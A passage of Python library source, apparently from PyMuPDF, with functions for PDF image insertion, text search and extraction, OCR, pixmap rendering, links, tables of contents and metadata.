        "keep_proportion",
        "mask",
        "oc",
        "overlay",
        "pixmap",
        "rotate",
        "stream",
        "width",
        "xref",
    }
    s = set(kwargs.keys()).difference(valid_keys)
    if s != set():
        raise ValueError(f"bad key argument(s): {s}.")
    filename = kwargs.get("filename")
    pixmap = kwargs.get("pixmap")
    stream = kwargs.get("stream")
    mask = kwargs.get("mask")
    rotate = int(kwargs.get("rotate", 0))
    width = int(kwargs.get("width", 0))
    height = int(kwargs.get("height", 0))
    alpha = int(kwargs.get("alpha", -1))
    oc = int(kwargs.get("oc", 0))
    xref = int(kwargs.get("xref", 0))
    keep_proportion = bool(kwargs.get("keep_proportion", True))
    overlay = bool(kwargs.get("overlay", True))
    if xref == 0 and (bool(filename) + bool(stream) + bool(pixmap) != 1):
        raise ValueError("xref=0 needs exactly one of filename, pixmap, stream")
    if filename:
        # accept str, pathlib.Path (has .absolute) or file objects (have .name)
        if type(filename) is str:
            pass
        elif hasattr(filename, "absolute"):
            filename = str(filename)
        elif hasattr(filename, "name"):
            filename = filename.name
        else:
            raise ValueError("bad filename")
    if filename and not os.path.exists(filename):
        raise FileNotFoundError("No such file: '%s'" % filename)
    elif stream and type(stream) not in (bytes, bytearray, io.BytesIO):
        raise ValueError("stream must be bytes-like / BytesIO")
    elif pixmap and type(pixmap) is not Pixmap:
        raise ValueError("pixmap must be a Pixmap")
    if mask and not (stream or filename):
        raise ValueError("mask requires stream or filename")
    if mask and type(mask) not in (bytes, bytearray, io.BytesIO):
        raise ValueError("mask must be bytes-like / BytesIO")
    # normalize rotation into [0, 360) — Python's modulo handles negatives
    rotate = rotate % 360
    if rotate not in (0, 90, 180, 270):
        raise ValueError("bad rotate value")
    r = Rect(rect)
    if r.is_empty or r.is_infinite:
        raise ValueError("rect must be finite and not empty")
    clip = r * ~page.transformation_matrix  # target rect in PDF coordinates
    # Create a unique image reference name.
    ilst = [i[7] for i in doc.get_page_images(page.number)]
    ilst += [i[1] for i in doc.get_page_xobjects(page.number)]
    ilst += [i[4] for i in doc.get_page_fonts(page.number)]
    n = "fzImg"  # 'fitz image'
    i = 0
    _imgname = n + "0"  # first name candidate
    while _imgname in ilst:
        i += 1
        _imgname = n + str(i)  # try new name
    # MD5 digests of images inserted so far — enables reuse of identical images
    digests = doc.InsertedImages
    xref, digests = page._insert_image(
        filename=filename,
        pixmap=pixmap,
        stream=stream,
        imask=mask,
        clip=clip,
        overlay=overlay,
        oc=oc,
        xref=xref,
        rotate=rotate,
        keep_proportion=keep_proportion,
        width=width,
        height=height,
        alpha=alpha,
        _imgname=_imgname,
        digests=digests,
    )
    if digests is not None:
        doc.InsertedImages = digests
    return xref
def search_for(*args, **kwargs) -> list:
    """Search for a string on a page.
    Args:
        text: string to be searched for
        clip: restrict search to this rectangle
        quads: (bool) return quads instead of rectangles
        flags: bit switches, default: join hyphened words
        textpage: a pre-created TextPage
    Returns:
        a list of rectangles or quads, each containing one occurrence.
    Raises:
        ValueError: for a bad number of positional arguments or a textpage
            belonging to another page.
    """
    if len(args) != 2:
        raise ValueError("bad number of positional parameters")
    page, text = args
    quads = kwargs.get("quads", 0)
    clip = kwargs.get("clip")
    textpage = kwargs.get("textpage")
    if clip is not None:  # identity check: any rect-like value is accepted
        clip = Rect(clip)
    flags = kwargs.get(
        "flags",
        TEXT_DEHYPHENATE
        | TEXT_PRESERVE_WHITESPACE
        | TEXT_PRESERVE_LIGATURES
        | TEXT_MEDIABOX_CLIP,
    )
    CheckParent(page)
    tp = textpage
    if tp is None:
        tp = page.get_textpage(clip=clip, flags=flags)  # create TextPage
    elif getattr(tp, "parent") != page:
        raise ValueError("not a textpage of this page")
    rlist = tp.search(text, quads=quads)
    if textpage is None:
        del tp  # only dispose of a textpage we created ourselves
    return rlist
def search_page_for(
    doc: Document,
    pno: int,
    text: str,
    quads: bool = False,
    clip: rect_like = None,
    flags: int = TEXT_DEHYPHENATE
    | TEXT_PRESERVE_LIGATURES
    | TEXT_PRESERVE_WHITESPACE
    | TEXT_MEDIABOX_CLIP,
    textpage: TextPage = None,
) -> list:
    """Search for a string on a page.
    Convenience wrapper: loads page 'pno' and delegates to Page.search_for.
    Args:
        pno: page number
        text: string to be searched for
        clip: restrict search to this rectangle
        quads: (bool) return quads instead of rectangles
        flags: bit switches, default: join hyphened words
        textpage: reuse a prepared textpage
    Returns:
        a list of rectangles or quads, each containing an occurrence.
    """
    page = doc[pno]
    return page.search_for(
        text, quads=quads, clip=clip, flags=flags, textpage=textpage
    )
def get_text_blocks(
    page: Page,
    clip: rect_like = None,
    flags: OptInt = None,
    textpage: TextPage = None,
    sort: bool = False,
) -> list:
    """Return the text blocks on a page.
    Notes:
        Lines in a block are concatenated with line breaks.
    Args:
        clip: restrict extraction to this rectangle.
        flags: (int) control the amount of data parsed into the textpage.
        textpage: reuse this TextPage instead of creating one.
        sort: sort blocks by vertical, then horizontal position.
    Returns:
        A list of the blocks. Each item contains the containing rectangle
        coordinates, text lines, block type and running block number.
    Raises:
        ValueError: if 'textpage' belongs to another page.
    """
    CheckParent(page)
    if flags is None:
        # default: keep whitespace / images / ligatures, clip to mediabox
        flags = (
            TEXT_PRESERVE_WHITESPACE
            | TEXT_PRESERVE_IMAGES
            | TEXT_PRESERVE_LIGATURES
            | TEXT_MEDIABOX_CLIP
        )
    tp = textpage
    if tp is None:
        tp = page.get_textpage(clip=clip, flags=flags)
    elif getattr(tp, "parent") != page:
        raise ValueError("not a textpage of this page")
    blocks = tp.extractBLOCKS()
    if textpage is None:
        del tp  # only dispose of a textpage we created ourselves
    if sort is True:
        # reading order: by bottom coordinate (b[3]), then left (b[0])
        blocks.sort(key=lambda b: (b[3], b[0]))
    return blocks
def get_text_words(
    page: Page,
    clip: rect_like = None,
    flags: OptInt = None,
    textpage: TextPage = None,
    sort: bool = False,
    delimiters=None,
) -> list:
    """Return the text words as a list with the bbox for each word.
    Args:
        clip: restrict extraction to this rectangle.
        flags: (int) control the amount of data parsed into the textpage.
        textpage: reuse this TextPage instead of creating one.
        sort: sort words by vertical, then horizontal position.
        delimiters: (str,list) characters to use as word delimiters
    Returns:
        Word tuples (x0, y0, x1, y1, "word", bno, lno, wno).
    Raises:
        ValueError: if 'textpage' belongs to another page.
    """
    CheckParent(page)
    if flags is None:
        flags = TEXT_PRESERVE_WHITESPACE | TEXT_PRESERVE_LIGATURES | TEXT_MEDIABOX_CLIP
    tp = textpage
    if tp is None:
        tp = page.get_textpage(clip=clip, flags=flags)
    elif getattr(tp, "parent") != page:
        raise ValueError("not a textpage of this page")
    words = tp.extractWORDS(delimiters)
    if textpage is None:
        del tp  # only dispose of a textpage we created ourselves
    if sort is True:
        # reading order: by bottom coordinate (w[3]), then left (w[0])
        words.sort(key=lambda w: (w[3], w[0]))
    return words
def get_textbox(
    page: Page,
    rect: rect_like,
    textpage: TextPage = None,
) -> str:
    """Return the plain text contained in the given rectangle."""
    own_tp = textpage is None  # did we create the textpage ourselves?
    tp = page.get_textpage() if own_tp else textpage
    if not own_tp and getattr(tp, "parent") != page:
        raise ValueError("not a textpage of this page")
    text = tp.extractTextbox(rect)
    if own_tp:
        del tp  # only dispose of a textpage we created ourselves
    return text
def get_text_selection(
    page: Page,
    p1: point_like,
    p2: point_like,
    clip: rect_like = None,
    textpage: TextPage = None,
):
    """Return the text of the virtual selection between points p1 and p2."""
    CheckParent(page)
    own_tp = textpage is None  # did we create the textpage ourselves?
    if own_tp:
        tp = page.get_textpage(clip=clip, flags=TEXT_DEHYPHENATE)
    else:
        tp = textpage
        if getattr(tp, "parent") != page:
            raise ValueError("not a textpage of this page")
    selection = tp.extractSelection(p1, p2)
    if own_tp:
        del tp  # only dispose of a textpage we created ourselves
    return selection
def get_textpage_ocr(
    page: Page,
    flags: int = 0,
    language: str = "eng",
    dpi: int = 72,
    full: bool = False,
    tessdata: str = None,
) -> TextPage:
    """Create a Textpage from combined results of normal and OCR text parsing.
    Args:
        flags: (int) control content becoming part of the result.
        language: (str) specify expected language(s). Deafault is "eng" (English).
        dpi: (int) resolution in dpi, default 72.
        full: (bool) whether to OCR the full page image, or only its images (default)
        tessdata: (str) folder with Tesseract language data; overrides the
            TESSDATA_PREFIX environment variable.
    Raises:
        RuntimeError: when neither 'tessdata' nor TESSDATA_PREFIX is set.
    """
    CheckParent(page)
    if not os.getenv("TESSDATA_PREFIX") and not tessdata:
        raise RuntimeError("No OCR support: TESSDATA_PREFIX not set")
    def full_ocr(page, dpi, language, flags):
        # Render the whole page to a pixmap at the requested dpi, OCR it into
        # a 1-page PDF, and extract that page's textpage scaled back to the
        # original page's coordinate system.
        zoom = dpi / 72
        mat = Matrix(zoom, zoom)
        pix = page.get_pixmap(matrix=mat)
        ocr_pdf = Document(
            "pdf",
            pix.pdfocr_tobytes(compress=False, language=language, tessdata=tessdata),
        )
        ocr_page = ocr_pdf.load_page(0)
        unzoom = page.rect.width / ocr_page.rect.width
        # map OCR page coordinates back, undoing zoom and page rotation
        ctm = Matrix(unzoom, unzoom) * page.derotation_matrix
        tpage = ocr_page.get_textpage(flags=flags, matrix=ctm)
        ocr_pdf.close()
        pix = None
        tpage.parent = weakref.proxy(page)
        return tpage
    # if OCR for the full page, OCR its pixmap @ desired dpi
    if full is True:
        return full_ocr(page, dpi, language, flags)
    # For partial OCR, make a normal textpage, then extend it with text that
    # is OCRed from each image.
    # Because of this, we need the images flag bit set ON.
    tpage = page.get_textpage(flags=flags)
    for block in page.get_text("dict", flags=TEXT_PRESERVE_IMAGES)["blocks"]:
        if block["type"] != 1:  # only look at images
            continue
        bbox = Rect(block["bbox"])
        if bbox.width <= 3 or bbox.height <= 3:  # ignore tiny stuff
            continue
        try:
            pix = Pixmap(block["image"])  # get image pixmap
            if pix.n - pix.alpha != 3:  # we need to convert this to RGB!
                pix = Pixmap(csRGB, pix)
            if pix.alpha:  # must remove alpha channel
                pix = Pixmap(pix, 0)
            imgdoc = Document(
                "pdf", pix.pdfocr_tobytes(language=language, tessdata=tessdata)
            )  # pdf with OCRed page
            imgpage = imgdoc.load_page(0)  # read image as a page
            pix = None
            # compute matrix to transform coordinates back to that of 'page'
            imgrect = imgpage.rect  # page size of image PDF
            shrink = Matrix(1 / imgrect.width, 1 / imgrect.height)
            mat = shrink * block["transform"]
            imgpage.extend_textpage(tpage, flags=0, matrix=mat)
            imgdoc.close()
        except RuntimeError:
            # per-image OCR failed: discard partial result, OCR the full page
            tpage = None
            print("Falling back to full page OCR")
            return full_ocr(page, dpi, language, flags)
    return tpage
def get_image_info(page: Page, hashes: bool = False, xrefs: bool = False) -> list:
    """Extract image information only from a TextPage.
    Args:
        hashes: (bool) include MD5 hash for each image.
        xrefs: (bool) try to find the xref for each image. Sets hashes to true.
    Returns:
        A list of dicts, one per displayed image.
    """
    doc = page.parent
    if xrefs and doc.is_pdf:
        hashes = True  # xref lookup requires digests for matching
    if not doc.is_pdf:
        xrefs = False  # xrefs only exist in PDF documents
    # reuse a previously cached result when possible
    imginfo = getattr(page, "_image_info", None)
    if imginfo and not xrefs:
        return imginfo
    if not imginfo:
        tp = page.get_textpage(flags=TEXT_PRESERVE_IMAGES)
        imginfo = tp.extractIMGINFO(hashes=hashes)
        del tp
        if hashes:
            page._image_info = imginfo  # cache for subsequent calls
    if not xrefs or not doc.is_pdf:
        return imginfo
    # map image digests to their xrefs via the page's image list
    imglist = page.get_images()
    digests = {}
    for item in imglist:
        xref = item[0]
        pix = Pixmap(doc, xref)
        digests[pix.digest] = xref
        del pix
    # attach the matching xref (0 if not found) to each info dict
    for i in range(len(imginfo)):
        item = imginfo[i]
        xref = digests.get(item["digest"], 0)
        item["xref"] = xref
        imginfo[i] = item
    return imginfo
def get_image_rects(page: Page, name, transform=False) -> list:
    """Return list of image positions on a page.
    Args:
        name: (str, list, int) image identification. May be reference name, an
            item of the page's image list or an xref.
        transform: (bool) whether to also return the transformation matrix.
    Returns:
        A list of Rect objects or tuples of (Rect, Matrix) for all image
        locations on the page.
    Raises:
        ValueError: when 'name' matches no image or multiple images.
    """
    # resolve 'name' to an xref: image-list item, plain xref, or ref name
    if type(name) in (list, tuple):
        xref = name[0]
    elif type(name) is int:
        xref = name
    else:
        imglist = [i for i in page.get_images() if i[7] == name]
        if imglist == []:
            raise ValueError("bad image name")
        elif len(imglist) != 1:
            raise ValueError("multiple image names found")
        xref = imglist[0][0]
    pix = Pixmap(page.parent, xref)  # make pixmap of the image to compute MD5
    digest = pix.digest
    del pix
    # match displayed images by MD5 digest — the same image object may
    # appear several times on the page
    infos = page.get_image_info(hashes=True)
    if not transform:
        bboxes = [Rect(im["bbox"]) for im in infos if im["digest"] == digest]
    else:
        bboxes = [
            (Rect(im["bbox"]), Matrix(im["transform"]))
            for im in infos
            if im["digest"] == digest
        ]
    return bboxes
def get_text(
    page: Page,
    option: str = "text",
    clip: rect_like = None,
    flags: OptInt = None,
    textpage: TextPage = None,
    sort: bool = False,
    delimiters=None,
):
    """Extract text from a page or an annotation.
    This is a unifying wrapper for various methods of the TextPage class.
    Args:
        option: (str) text, words, blocks, html, dict, json, rawdict, xhtml or xml.
        clip: (rect-like) restrict output to this area.
        flags: bit switches to e.g. exclude images or decompose ligatures.
        textpage: reuse this TextPage and make no new one. If specified,
            'flags' and 'clip' are ignored.
    Returns:
        the output of methods get_text_words / get_text_blocks or TextPage
        methods extractText, extractHTML, extractDICT, extractJSON, extractRAWDICT,
        extractXHTML or etractXML respectively.
        Default and misspelling choice is "text".
    """
    # per-option default flag sets
    formats = {
        "text": fitz.TEXTFLAGS_TEXT,
        "html": fitz.TEXTFLAGS_HTML,
        "json": fitz.TEXTFLAGS_DICT,
        "rawjson": fitz.TEXTFLAGS_RAWDICT,
        "xml": fitz.TEXTFLAGS_XML,
        "xhtml": fitz.TEXTFLAGS_XHTML,
        "dict": fitz.TEXTFLAGS_DICT,
        "rawdict": fitz.TEXTFLAGS_RAWDICT,
        "words": fitz.TEXTFLAGS_WORDS,
        "blocks": fitz.TEXTFLAGS_BLOCKS,
    }
    option = option.lower()
    if option not in formats:
        option = "text"  # unknown / misspelled options fall back to "text"
    if flags is None:
        flags = formats[option]
    if option == "words":
        return get_text_words(
            page,
            clip=clip,
            flags=flags,
            textpage=textpage,
            sort=sort,
            delimiters=delimiters,
        )
    if option == "blocks":
        return get_text_blocks(
            page, clip=clip, flags=flags, textpage=textpage, sort=sort
        )
    CheckParent(page)
    cb = None
    if option in ("html", "xml", "xhtml"):  # no clipping for MuPDF functions
        clip = page.cropbox
    if clip is not None:  # identity check: any rect-like value is accepted
        clip = Rect(clip)
        cb = None
    elif type(page) is Page:
        cb = page.cropbox
    # TextPage with or without images
    tp = textpage
    if tp is None:
        tp = page.get_textpage(clip=clip, flags=flags)
    elif getattr(tp, "parent") != page:
        raise ValueError("not a textpage of this page")
    # dispatch to the matching TextPage extraction method
    if option == "json":
        t = tp.extractJSON(cb=cb, sort=sort)
    elif option == "rawjson":
        t = tp.extractRAWJSON(cb=cb, sort=sort)
    elif option == "dict":
        t = tp.extractDICT(cb=cb, sort=sort)
    elif option == "rawdict":
        t = tp.extractRAWDICT(cb=cb, sort=sort)
    elif option == "html":
        t = tp.extractHTML()
    elif option == "xml":
        t = tp.extractXML()
    elif option == "xhtml":
        t = tp.extractXHTML()
    else:
        t = tp.extractText(sort=sort)
    if textpage is None:
        del tp  # only dispose of a textpage we created ourselves
    return t
def get_page_text(
    doc: Document,
    pno: int,
    option: str = "text",
    clip: rect_like = None,
    flags: OptInt = None,
    textpage: TextPage = None,
    sort: bool = False,
) -> typing.Any:
    """Extract a document page's text by page number.
    Notes:
        Convenience function calling page.get_text().
    Args:
        pno: page number
        option: (str) text, words, blocks, html, dict, json, rawdict, xhtml or xml.
        clip: (rect-like) restrict output to this area.
        flags: bit switches controlling the textpage content.
        textpage: reuse a prepared TextPage.
        sort: sort the extracted items.
    Returns:
        output from page.TextPage().
    """
    # Fix: the 'textpage' argument was previously accepted but silently
    # dropped — forward it so a prepared TextPage is actually reused.
    return doc[pno].get_text(
        option, clip=clip, flags=flags, textpage=textpage, sort=sort
    )
def get_pixmap(
    page: Page,
    *,
    matrix: matrix_like = Identity,
    dpi=None,
    colorspace: Colorspace = csRGB,
    clip: rect_like = None,
    alpha: bool = False,
    annots: bool = True,
) -> Pixmap:
    """Create pixmap of page.
    Keyword args:
        matrix: Matrix for transformation (default: Identity).
        dpi: desired dots per inch. If given, matrix is ignored.
        colorspace: (str/Colorspace) cmyk, rgb, gray - case ignored, default csRGB.
        clip: (irect-like) restrict rendering to this area.
        alpha: (bool) whether to include alpha channel
        annots: (bool) whether to also render annotations
    Raises:
        ValueError: for an unsupported colorspace.
    """
    CheckParent(page)
    if dpi:
        # dpi overrides matrix: derive a uniform zoom from 72 dpi base
        zoom = dpi / 72
        matrix = Matrix(zoom, zoom)
    if type(colorspace) is str:
        # map string names to Colorspace objects; unknown strings mean RGB
        if colorspace.upper() == "GRAY":
            colorspace = csGRAY
        elif colorspace.upper() == "CMYK":
            colorspace = csCMYK
        else:
            colorspace = csRGB
    if colorspace.n not in (1, 3, 4):
        raise ValueError("unsupported colorspace")
    # render via a display list so 'annots' can be honored
    dl = page.get_displaylist(annots=annots)
    pix = dl.get_pixmap(matrix=matrix, colorspace=colorspace, alpha=alpha, clip=clip)
    dl = None
    if dpi:
        pix.set_dpi(dpi, dpi)  # record the requested resolution in the pixmap
    return pix
def get_page_pixmap(
    doc: Document,
    pno: int,
    *,
    matrix: matrix_like = Identity,
    dpi=None,
    colorspace: Colorspace = csRGB,
    clip: rect_like = None,
    alpha: bool = False,
    annots: bool = True,
) -> Pixmap:
    """Create pixmap of document page by page number.
    Convenience wrapper: loads page 'pno' and delegates to Page.get_pixmap.
    Args:
        pno: (int) page number
        matrix: Matrix for transformation (default: Identity).
        colorspace: (str,Colorspace) rgb, rgb, gray - case ignored, default csRGB.
        clip: (irect-like) restrict rendering to this area.
        alpha: (bool) include alpha channel
        annots: (bool) also render annotations
    """
    page = doc[pno]
    return page.get_pixmap(
        matrix=matrix,
        dpi=dpi,
        colorspace=colorspace,
        clip=clip,
        alpha=alpha,
        annots=annots,
    )
def getLinkDict(ln) -> dict:
    """Convert a Link / Outline object into a plain dictionary.
    Args:
        ln: a link or outline item with a '.dest' destination attribute.
    Returns:
        dict with 'kind', 'xref', and kind-specific keys (uri/page/to/zoom/
        file/name). 'from' (the hot rectangle) is included when available.
    """
    nl = {"kind": ln.dest.kind, "xref": 0}
    try:
        nl["from"] = ln.rect
    except Exception:  # narrow from bare 'except': never mask SystemExit etc.
        pass
    pnt = Point(0, 0)
    # the destination's target point is only valid flag-by-flag
    if ln.dest.flags & LINK_FLAG_L_VALID:
        pnt.x = ln.dest.lt.x
    if ln.dest.flags & LINK_FLAG_T_VALID:
        pnt.y = ln.dest.lt.y
    if ln.dest.kind == LINK_URI:
        nl["uri"] = ln.dest.uri
    elif ln.dest.kind == LINK_GOTO:
        nl["page"] = ln.dest.page
        nl["to"] = pnt
        if ln.dest.flags & LINK_FLAG_R_IS_ZOOM:
            nl["zoom"] = ln.dest.rb.x
        else:
            nl["zoom"] = 0.0
    elif ln.dest.kind == LINK_GOTOR:
        nl["file"] = ln.dest.fileSpec.replace("\\", "/")
        nl["page"] = ln.dest.page
        if ln.dest.page < 0:
            # negative page: destination is a named location in the file
            nl["to"] = ln.dest.dest
        else:
            nl["to"] = pnt
            if ln.dest.flags & LINK_FLAG_R_IS_ZOOM:
                nl["zoom"] = ln.dest.rb.x
            else:
                nl["zoom"] = 0.0
    elif ln.dest.kind == LINK_LAUNCH:
        nl["file"] = ln.dest.fileSpec.replace("\\", "/")
    elif ln.dest.kind == LINK_NAMED:
        nl["name"] = ln.dest.named
    else:
        nl["page"] = ln.dest.page
    return nl
def get_links(page: Page) -> list:
    """Create a list of all links contained in a PDF page.
    Notes:
        see PyMuPDF ducmentation for details.
    Returns:
        a list of dictionaries as produced by getLinkDict, enriched with
        'xref' and 'id' for PDF documents when possible.
    """
    CheckParent(page)
    # walk the singly-linked chain of Link objects
    ln = page.first_link
    links = []
    while ln:
        nl = getLinkDict(ln)
        links.append(nl)
        ln = ln.next
    if links != [] and page.parent.is_pdf:
        # attach the xref / id of each link annotation; only safe when the
        # annotation count matches the number of links found
        linkxrefs = [x for x in page.annot_xrefs() if x[1] == PDF_ANNOT_LINK]
        if len(linkxrefs) == len(links):
            for i in range(len(linkxrefs)):
                links[i]["xref"] = linkxrefs[i][0]
                links[i]["id"] = linkxrefs[i][2]
    return links
def get_toc(
    doc: Document,
    simple: bool = True,
) -> list:
    """Create a table of contents.
    Args:
        simple: a bool to control output. Returns a list, where each entry consists of outline level, title, page number and link destination (if simple = False). For details see PyMuPDF's documentation.
    Raises:
        ValueError: if the document is closed.
    """
    def recurse(olItem, liste, lvl):
        """Recursively follow the outline item chain and record item information in a list."""
        while olItem:
            if olItem.title:
                title = olItem.title
            else:
                title = " "  # never emit an empty title
            if not olItem.is_external:
                if olItem.uri:
                    if olItem.page == -1:
                        # page unknown: resolve the URI to find it
                        resolve = doc.resolve_link(olItem.uri)
                        page = resolve[0] + 1
                    else:
                        page = olItem.page + 1  # 0-based -> 1-based
                else:
                    page = -1
            else:
                page = -1  # external targets have no page number
            if not simple:
                link = getLinkDict(olItem)
                liste.append([lvl, title, page, link])
            else:
                liste.append([lvl, title, page])
            if olItem.down:
                # descend one hierarchy level
                liste = recurse(olItem.down, liste, lvl + 1)
            olItem = olItem.next
        return liste
    # ensure document is open
    if doc.is_closed:
        raise ValueError("document closed")
    doc.init_doc()
    olItem = doc.outline
    if not olItem:
        return []
    lvl = 1
    liste = []
    toc = recurse(olItem, liste, lvl)
    if doc.is_pdf and simple is False:
        doc._extend_toc_items(toc)  # add color / bold / collapse details
    return toc
def del_toc_item(
    doc: Document,
    idx: int,
) -> None:
    """Delete TOC / bookmark item by index.
    Args:
        idx: (int) index into the list produced by get_toc.
    """
    # resolve the index to the outline item's xref, then remove it
    item_xref = doc.get_outline_xrefs()[idx]
    doc._remove_toc_item(item_xref)
def set_toc_item(
    doc: Document,
    idx: int,
    dest_dict: OptDict = None,
    kind: OptInt = None,
    pno: OptInt = None,
    uri: OptStr = None,
    title: OptStr = None,
    to: point_like = None,
    filename: OptStr = None,
    zoom: float = 0,
) -> None:
    """Update TOC item by index.
    It allows changing the item's title and link destination.
    Args:
        idx: (int) desired index of the TOC list, as created by get_toc.
        dest_dict: (dict) destination dictionary as created by get_toc(False).
            Outrules all other parameters. If None, the remaining parameters
            are used to make a dest dictionary.
        kind: (int) kind of link (LINK_GOTO, etc.). If None, then only the
            title will be updated. If LINK_NONE, the TOC item will be deleted.
        pno: (int) page number (1-based like in get_toc). Required if LINK_GOTO.
        uri: (str) the URL, required if LINK_URI.
        title: (str) the new title. No change if None.
        to: (point-like) destination on the target page. If omitted, (72, 36)
            will be used as taget coordinates.
        filename: (str) destination filename, required for LINK_GOTOR and
            LINK_LAUNCH.
        name: (str) a destination name for LINK_NAMED.
        zoom: (float) a zoom factor for the target location (LINK_GOTO).
    Raises:
        ValueError: for a bad page number, color value or destination.
    """
    xref = doc.get_outline_xrefs()[idx]  # xref of the outline item to change
    page_xref = 0
    if type(dest_dict) is dict:
        # full destination dictionary given — takes precedence over the
        # individual keyword parameters
        if dest_dict["kind"] == LINK_GOTO:
            pno = dest_dict["page"]
            page_xref = doc.page_xref(pno)
            page_height = doc.page_cropbox(pno).height
            to = dest_dict.get("to", Point(72, 36))
            # convert from top-left-origin to PDF bottom-left-origin coords
            to.y = page_height - to.y
            dest_dict["to"] = to
        action = getDestStr(page_xref, dest_dict)
        if not action.startswith("/A"):
            raise ValueError("bad bookmark dest")
        color = dest_dict.get("color")
        if color:
            color = list(map(float, color))
            if len(color) != 3 or min(color) < 0 or max(color) > 1:
                raise ValueError("bad color value")
        bold = dest_dict.get("bold", False)
        italic = dest_dict.get("italic", False)
        flags = italic + 2 * bold  # PDF outline style bit flags
        collapse = dest_dict.get("collapse")
        return doc._update_toc_item(
            xref,
            action=action[2:],
            title=title,
            color=color,
            flags=flags,
            collapse=collapse,
        )
    if kind == LINK_NONE:  # delete bookmark item
        return doc.del_toc_item(idx)
    if kind is None and title is None:  # treat as no-op
        return None
    if kind is None:  # only update title text
        return doc._update_toc_item(xref, action=None, title=title)
    if kind == LINK_GOTO:
        if pno is None or pno not in range(1, doc.page_count + 1):
            raise ValueError("bad page number")
        # 'pno' is 1-based here; internal page access is 0-based
        page_xref = doc.page_xref(pno - 1)
        page_height = doc.page_cropbox(pno - 1).height
        if to is None:
            to = Point(72, page_height - 36)  # default target position
        else:
            to = Point(to)
            # convert from top-left-origin to PDF bottom-left-origin coords
            to.y = page_height - to.y
    # assemble a destination dictionary from the individual parameters
    ddict = {
        "kind": kind,
        "to": to,
        "uri": uri,
        "page": pno,
        "file": filename,
        "zoom": zoom,
    }
    action = getDestStr(page_xref, ddict)
    if action == "" or not action.startswith("/A"):
        raise ValueError("bad bookmark dest")
    return doc._update_toc_item(xref, action=action[2:], title=title)
def get_area(*args) -> float:
    """Calculate area of rectangle.\nparameter is one of 'px' (default), 'in', 'cm', or 'mm'."""
    rect = args[0]
    unit = args[1] if len(args) > 1 else "px"
    # per-unit (length-per-inch, points-per-inch) conversion pairs
    conversions = {
        "px": (1, 1),
        "in": (1.0, 72.0),
        "cm": (2.54, 72.0),
        "mm": (25.4, 72.0),
    }
    per_inch, points = conversions[unit]
    scale = (per_inch / points) ** 2  # squared linear factor = area factor
    return rect.width * rect.height * scale
def set_metadata(doc: Document, m: dict) -> None:
    """Update the PDF /Info object.
    Args:
        m: a dictionary like doc.metadata.
    Raises:
        ValueError: for a non-PDF, a closed/encrypted document, or bad keys.
    """
    if not doc.is_pdf:
        raise ValueError("is no PDF")
    if doc.is_closed or doc.is_encrypted:
        raise ValueError("document closed or encrypted")
    if type(m) is not dict:
        raise ValueError("bad metadata")
    # map doc.metadata keys to /Info dictionary keys; None means the key
    # is informational only and never written back
    keymap = {
        "author": "Author",
        "producer": "Producer",
        "creator": "Creator",
        "title": "Title",
        "format": None,
        "encryption": None,
        "creationDate": "CreationDate",
        "modDate": "ModDate",
        "subject": "Subject",
        "keywords": "Keywords",
        "trapped": "Trapped",
    }
    valid_keys = set(keymap.keys())
    diff_set = set(m.keys()).difference(valid_keys)
    if diff_set != set():
        msg = "bad dict key(s): %s" % diff_set
        raise ValueError(msg)
    # locate the current /Info object (0 = none present)
    t, temp = doc.xref_get_key(-1, "Info")
    if t != "xref":
        info_xref = 0
    else:
        info_xref = int(temp.replace("0 R", ""))
    if m == {} and info_xref == 0:  # nothing to do
        return
    if info_xref == 0:  # no prev metadata: get new xref
        info_xref = doc.get_new_xref()
        doc.update_object(info_xref, "<<>>")  # fill it with empty object
        doc.xref_set_key(-1, "Info", "%i 0 R" % info_xref)
    elif m == {}:  # remove existing metadata
        doc.xref_set_key(-1, "Info", "null")
        return
    # write each supplied value; empty / "none" / "null" clears the key
    for key, val in [(k, v) for k, v in m.items() if keymap[k] is not None]:
        pdf_key = keymap[key]
        if not bool(val) or val in ("none", "null"):
            val = "null"
        else:
            val = get_pdf_str(val)
        doc.xref_set_key(info_xref, pdf_key, val)
    doc.init_doc()  # refresh cached document information
    return
def getDestStr(xref: int, ddict: dict) -> str:
    """Calculate the PDF action string.
    Notes:
        Supports Link annotations and outline items (bookmarks).
    Args:
        xref: xref of the target page (for GoTo destinations).
        ddict: destination dictionary (or a plain number meaning a top
            coordinate on the page identified by 'xref').
    Returns:
        a PDF '/A<<...>>' action string, or "" when no action applies.
    """
    if not ddict:
        return ""
    # template strings for each supported action type
    str_goto = "/A<</S/GoTo/D[%i 0 R/XYZ %g %g %g]>>"
    str_gotor1 = "/A<</S/GoToR/D[%s /XYZ %g %g %g]/F<</F%s/UF%s/Type/Filespec>>>>"
    str_gotor2 = "/A<</S/GoToR/D%s/F<</F%s/UF%s/Type/Filespec>>>>"
    str_launch = "/A<</S/Launch/F<</F%s/UF%s/Type/Filespec>>>>"
    str_uri = "/A<</S/URI/URI%s>>"
    if type(ddict) in (int, float):
        # plain number: interpret as the 'top' coordinate on page 'xref'
        dest = str_goto % (xref, 0, ddict, 0)
        return dest
    d_kind = ddict.get("kind", LINK_NONE)
    if d_kind == LINK_NONE:
        return ""
    if ddict["kind"] == LINK_GOTO:
        d_zoom = ddict.get("zoom", 0)
        to = ddict.get("to", Point(0, 0))
        d_left, d_top = to
        dest = str_goto % (xref, d_left, d_top, d_zoom)
        return dest
    if ddict["kind"] == LINK_URI:
        dest = str_uri % (get_pdf_str(ddict["uri"]),)
        return dest
    if ddict["kind"] == LINK_LAUNCH:
        fspec = get_pdf_str(ddict["file"])
        dest = str_launch % (fspec, fspec)
        return dest
    if ddict["kind"] == LINK_GOTOR and ddict["page"] < 0:
        # negative page number: 'to' is a named destination in the file
        fspec = get_pdf_str(ddict["file"])
        dest = str_gotor2 % (get_pdf_str(ddict["to"]), fspec, fspec)
        return dest
    if ddict["kind"] == LINK_GOTOR and ddict["page"] >= 0:
        fspec = get_pdf_str(ddict["file"])
        dest = str_gotor1 % (
            ddict["page"],
            ddict["to"].x,
            ddict["to"].y,
            ddict["zoom"],
            fspec,
            fspec,
        )
        return dest
    return ""
def set_toc(
    doc: Document,
    toc: list,
    collapse: int = 1,
) -> int:
    """Create new outline tree (table of contents, TOC).

    Args:
        toc: (list, tuple) each entry must contain level, title, page and
            optionally top margin on the page. None or '()' remove the TOC.
        collapse: (int) collapses entries beyond this level. Zero or None
            shows all entries unfolded.
    Returns:
        the number of inserted items, or the number of removed items respectively.
    Raises:
        ValueError: closed/encrypted document, non-PDF, or malformed 'toc'.
    """
    if doc.is_closed or doc.is_encrypted:
